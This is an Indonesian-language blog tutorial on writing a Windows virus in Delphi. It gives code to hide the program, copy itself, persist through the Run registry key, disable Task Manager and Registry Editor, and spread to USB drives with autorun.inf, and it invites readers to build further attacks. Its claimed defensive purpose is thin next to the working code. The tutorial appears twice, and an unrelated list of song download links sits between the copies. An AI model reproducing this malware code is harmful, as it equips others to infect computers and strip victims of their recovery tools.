Tips dan Trik Membuat Virus dari Delphi

Minggu, 15 Januari 2012

Begin
Topik ini mungkin sebenarnya udah basi, tapi kenyataanya masih banyak orang yang menghubungi aku untuk nanya-nanya soal programming virus. Karena itu, pada tutorial ini aku memutuskan untuk menjelaskan dasar-dasar pemrograman virus dengan Delphi. Tapi ingat, segala kerusakan dan kehilangan data karena artikel ini diluar tanggung jawabku sebagai penulis. OK ? Dan saya memuat artikel ini bukan untuk merusak, tetapi agar kita semua bisa mengetahui bagaimana virus itu beraksi, jadi kita bisa menghalangi virus yg masuk ke pc kita. Kalo setuju silakan lanjut.

Topik ini mungkin sebenarnya udah basi, tapi kenyataanya masih banyak orang yang menghubungi aku untuk nanya-nanya soal programming virus. Karena itu, pada tutorial ini aku memutuskan untuk menjelaskan dasar-dasar pemrograman virus dengan Delphi. Tapi ingat, segala kerusakan dan kehilangan data karena artikel ini diluar tanggung jawabku sebagai penulis. OK ? Dan saya memuat artikel ini bukan untuk merusak, tetapi agar kita semua bisa mengetahui bagaimana virus itu beraksi, jadi kita bisa menghalangi virus yg masuk ke pc kita. Kalo setuju silakan lanjut.

Tingkat kerusakan yang ditimbulkan virus sangat bervariasi tergantung kreatifitas sang penulis virus. Hal-hal yang biasanya dilakukan oleh virus (terutama virus lokal) antara lain:
  • Menyembunyikan dirinya, artinya aplikasi akan berjalan tanpa sepengetahuan user
  • Meng-copy dirinya ke direktori sistem
  • Membuat dirinya otomatis dijalankan pada saat startup Windows
  • Mendisable fungsi-fungsi Windows tertentu seperti Task Manager, Registry Editor, dll
  • Men-copy dirinya ke media removable semacam flashdisk
  • Fungsi-fungsi lain seperti memunculkan pesan, menulis file tertentu, mengubah tulisan Start", dll.
  • Sekarang kita akan membahasnya satu-persatu. Peralatan yang dibutuhkan: Yang udah pasti, Delphi Kesabaran, ketelitian, mata yang sanggup memandang layar komputer berjam-jam Album Yovie & Nuno dan segelas teh panas ;) Attack #1 - Menyembunyikan diri Kayaknya ini yang paling gampang deh, cukup ketikkan code berikut pada event form create: Application.ShowMainForm := False; Attack #2 - Men-copy diri ke sistem Sebenarnya gak harus ke direktori sistem sih, ini kan cuma untuk contoh aja. Langsung aja kerikkan code ini: CopyFile(PChar(Application.ExeName), 'C:\MyVirus.exe', False); Attack #3 - Startup otomatis Windows akan menjalankan program/script yang diletakkan pada:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    • C:\Documents and Settings\All Users\Start Menu\Programs\Startup
    • C:\Documents and Settings\[username]\Start Menu\Programs\Startup
    • Mo pilih yang mana ? Terserah. Untuk contoh kali ini, aku akan memilih registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Untuk itu, ketikkan code dbawah untuk mengakses registry dan membuat string value di path yg kusebutin diatas.
      code : pascal
      1. uses
      2. Registry;
      3. var
      4. Reg : TRegistry;
      5. begin
      6. Reg := TRegistry.Create;
      7. Reg.RootKey := HKEY_CURRENT_USER;
      8. Reg.OpenKey('HKCU\Software\Microsoft\Windows\CurrentVersion\Run', True);
      9. Reg.WriteString('MyVirus', 'C:\MyVirus.exe');
      10. Reg.CloseKey;
      Parsed in 0.003 seconds, using GeSHi
      Attack #4 - Disable tools bawaan Windows Ada banyak tools bawaan Windows yang bisa dipakai untuk melawan malware, karena terlalu banyak, aku cuma akan menjelaskan gimana cara blokir Registry Editor dan Task Manager. Yang lainnya kembangkan sendiri yach...!
      code : pascal
      1. uses
      2. Registry;
      3. var
      4. Reg : TRegistry;
      5. begin
      6. Reg := TRegistry.Create;
      7. Reg.RootKey := HKEY_CURRENT_USER;
      8. Reg.OpenKey('HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System',
      9. True);
      10. Reg.WriteInteger('DisableTaskMgr', 1); //disable Task Manager
      11. Reg.WriteInteger('DisableRegistryTools', 1); //disable Registry Editor
      12. Reg.CloseKey;
      Parsed in 0.003 seconds, using GeSHi
      Attack #5 - Menyebarkan diri ke flashdisk Kebanyakan virus menyebar karena flashdisk yang dicolokin ke komputer yang telah terinfeksi. Biasanya virus tsersebut tidak lupa untuk membuat file autorun.inf agar virus tersebut otomatis dieksekusi pas dicolokin ke koputer lain. Dan demi kesederhanaan agar mudah dipahami, aku hanya akan mencontohkan proses penyebaran ke drive G:\
      code : pascal
      1. "MsoNormal">var
      2. Atr : TextFile;
      3. begin
      4. if FileExists('G:\autorun.inf')= False and
      5. FileExists('G:\MyVirus.exe') = False then
      6. begin
      7. //virus belum men-copy dirinya, copy...
      8. CopyFile(PChar(Application.ExeName), 'G:\MyVirus.exe', False);
      9. //tulis file autorun.inf
      10. AssignFile(Atr, 'G:\autorun.inf');
      11. ReWrite(Atr);
      12. WriteLn(Atr, '[autorun]');
      13. WriteLn(Atr, 'open=MyVirus.exe');
      14. CloseFile(Atr);
      15. end;
      16. end;
      Parsed in 0.005 seconds, using GeSHi
      Akan lebih baik lagi kalo code diatas dieksekusi secara periodik oleh timer. Silakan kembangkan sendiri attack-attack lainnya seperti memunculkan pesan, menulis file-file aneh, dll. Semoga setelah melihat sekilas alur penyebaran virus kita jadi lebih tau trik-trik untuk melindungi komputer kita tanpa antivirus. Semoga bermanfaat.

0 komentar:

Posting Komentar

Lagu Daerah Bengkulu Selatan

http://www.ziddu.com/download/17765598/PantaiPasarBawah.mp3.html
http://www.ziddu.com/download/17770609/Ading.mp3.html
http://www.ziddu.com/download/17770638/BatinLingiran.mp3.html
http://www.ziddu.com/download/17770712/BeghasKedurang.mp3.html
http://www.ziddu.com/download/17765528/MutighKupi.mp3.html
http://www.ziddu.com/download/17765460/KasiahSayang.mp3.html
http://www.ziddu.com/download/17765364/KemaneAgi.mp3.html
http://www.ziddu.com/download/17765259/KebilauBaliak.mp3.html
http://www.ziddu.com/download/17765180/KedurangBadakuDillahirka.mp3.html
http://www.ziddu.com/download/17764830/TukangKundai.mp3.html
http://www.ziddu.com/download/17764761/SukatanMatau.mp3.html
http://www.ziddu.com/download/17764705/Sinjang.mp3.html
http://www.ziddu.com/download/17764641/Seginim.mp3.html
http://www.ziddu.com/download/17764579/sekundangsetungguan.mp3.html

sumber: Radio Artha FM Bengkulu Selatan

Tips dan Trik Membuat Virus dari Delphi


Begin
Topik ini mungkin sebenarnya udah basi, tapi kenyataanya masih banyak orang yang menghubungi aku untuk nanya-nanya soal programming virus. Karena itu, pada tutorial ini aku memutuskan untuk menjelaskan dasar-dasar pemrograman virus dengan Delphi. Tapi ingat, segala kerusakan dan kehilangan data karena artikel ini diluar tanggung jawabku sebagai penulis. OK ? Dan saya memuat artikel ini bukan untuk merusak, tetapi agar kita semua bisa mengetahui bagaimana virus itu beraksi, jadi kita bisa menghalangi virus yg masuk ke pc kita. Kalo setuju silakan lanjut.

Topik ini mungkin sebenarnya udah basi, tapi kenyataanya masih banyak orang yang menghubungi aku untuk nanya-nanya soal programming virus. Karena itu, pada tutorial ini aku memutuskan untuk menjelaskan dasar-dasar pemrograman virus dengan Delphi. Tapi ingat, segala kerusakan dan kehilangan data karena artikel ini diluar tanggung jawabku sebagai penulis. OK ? Dan saya memuat artikel ini bukan untuk merusak, tetapi agar kita semua bisa mengetahui bagaimana virus itu beraksi, jadi kita bisa menghalangi virus yg masuk ke pc kita. Kalo setuju silakan lanjut.

Tingkat kerusakan yang ditimbulkan virus sangat bervariasi tergantung kreatifitas sang penulis virus. Hal-hal yang biasanya dilakukan oleh virus (terutama virus lokal) antara lain:
  • Menyembunyikan dirinya, artinya aplikasi akan berjalan tanpa sepengetahuan user
  • Meng-copy dirinya ke direktori sistem
  • Membuat dirinya otomatis dijalankan pada saat startup Windows
  • Mendisable fungsi-fungsi Windows tertentu seperti Task Manager, Registry Editor, dll
  • Men-copy dirinya ke media removable semacam flashdisk
  • Fungsi-fungsi lain seperti memunculkan pesan, menulis file tertentu, mengubah tulisan Start", dll.
  • Sekarang kita akan membahasnya satu-persatu. Peralatan yang dibutuhkan: Yang udah pasti, Delphi Kesabaran, ketelitian, mata yang sanggup memandang layar komputer berjam-jam Album Yovie & Nuno dan segelas teh panas ;) Attack #1 - Menyembunyikan diri Kayaknya ini yang paling gampang deh, cukup ketikkan code berikut pada event form create: Application.ShowMainForm := False; Attack #2 - Men-copy diri ke sistem Sebenarnya gak harus ke direktori sistem sih, ini kan cuma untuk contoh aja. Langsung aja kerikkan code ini: CopyFile(PChar(Application.ExeName), 'C:\MyVirus.exe', False); Attack #3 - Startup otomatis Windows akan menjalankan program/script yang diletakkan pada:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    • C:\Documents and Settings\All Users\Start Menu\Programs\Startup
    • C:\Documents and Settings\[username]\Start Menu\Programs\Startup
    • Mo pilih yang mana ? Terserah. Untuk contoh kali ini, aku akan memilih registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Untuk itu, ketikkan code dbawah untuk mengakses registry dan membuat string value di path yg kusebutin diatas.
      code : pascal
      1. uses
      2. Registry;
      3. var
      4. Reg : TRegistry;
      5. begin
      6. Reg := TRegistry.Create;
      7. Reg.RootKey := HKEY_CURRENT_USER;
      8. Reg.OpenKey('HKCU\Software\Microsoft\Windows\CurrentVersion\Run', True);
      9. Reg.WriteString('MyVirus', 'C:\MyVirus.exe');
      10. Reg.CloseKey;
      Parsed in 0.003 seconds, using GeSHi
      Attack #4 - Disable tools bawaan Windows Ada banyak tools bawaan Windows yang bisa dipakai untuk melawan malware, karena terlalu banyak, aku cuma akan menjelaskan gimana cara blokir Registry Editor dan Task Manager. Yang lainnya kembangkan sendiri yach...!
      code : pascal
      1. uses
      2. Registry;
      3. var
      4. Reg : TRegistry;
      5. begin
      6. Reg := TRegistry.Create;
      7. Reg.RootKey := HKEY_CURRENT_USER;
      8. Reg.OpenKey('HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System',
      9. True);
      10. Reg.WriteInteger('DisableTaskMgr', 1); //disable Task Manager
      11. Reg.WriteInteger('DisableRegistryTools', 1); //disable Registry Editor
      12. Reg.CloseKey;
      Parsed in 0.003 seconds, using GeSHi
      Attack #5 - Menyebarkan diri ke flashdisk Kebanyakan virus menyebar karena flashdisk yang dicolokin ke komputer yang telah terinfeksi. Biasanya virus tsersebut tidak lupa untuk membuat file autorun.inf agar virus tersebut otomatis dieksekusi pas dicolokin ke koputer lain. Dan demi kesederhanaan agar mudah dipahami, aku hanya akan mencontohkan proses penyebaran ke drive G:\
      code : pascal
      1. "MsoNormal">var
      2. Atr : TextFile;
      3. begin
      4. if FileExists('G:\autorun.inf')= False and
      5. FileExists('G:\MyVirus.exe') = False then
      6. begin
      7. //virus belum men-copy dirinya, copy...
      8. CopyFile(PChar(Application.ExeName), 'G:\MyVirus.exe', False);
      9. //tulis file autorun.inf
      10. AssignFile(Atr, 'G:\autorun.inf');
      11. ReWrite(Atr);
      12. WriteLn(Atr, '[autorun]');
      13. WriteLn(Atr, 'open=MyVirus.exe');
      14. CloseFile(Atr);
      15. end;
      16. end;
      Parsed in 0.005 seconds, using GeSHi
      Akan lebih baik lagi kalo code diatas dieksekusi secara periodik oleh timer. Silakan kembangkan sendiri attack-attack lainnya seperti memunculkan pesan, menulis file-file aneh, dll. Semoga setelah melihat sekilas alur penyebaran virus kita jadi lebih tau trik-trik untuk melindungi komputer kita tanpa antivirus. Semoga bermanfaat.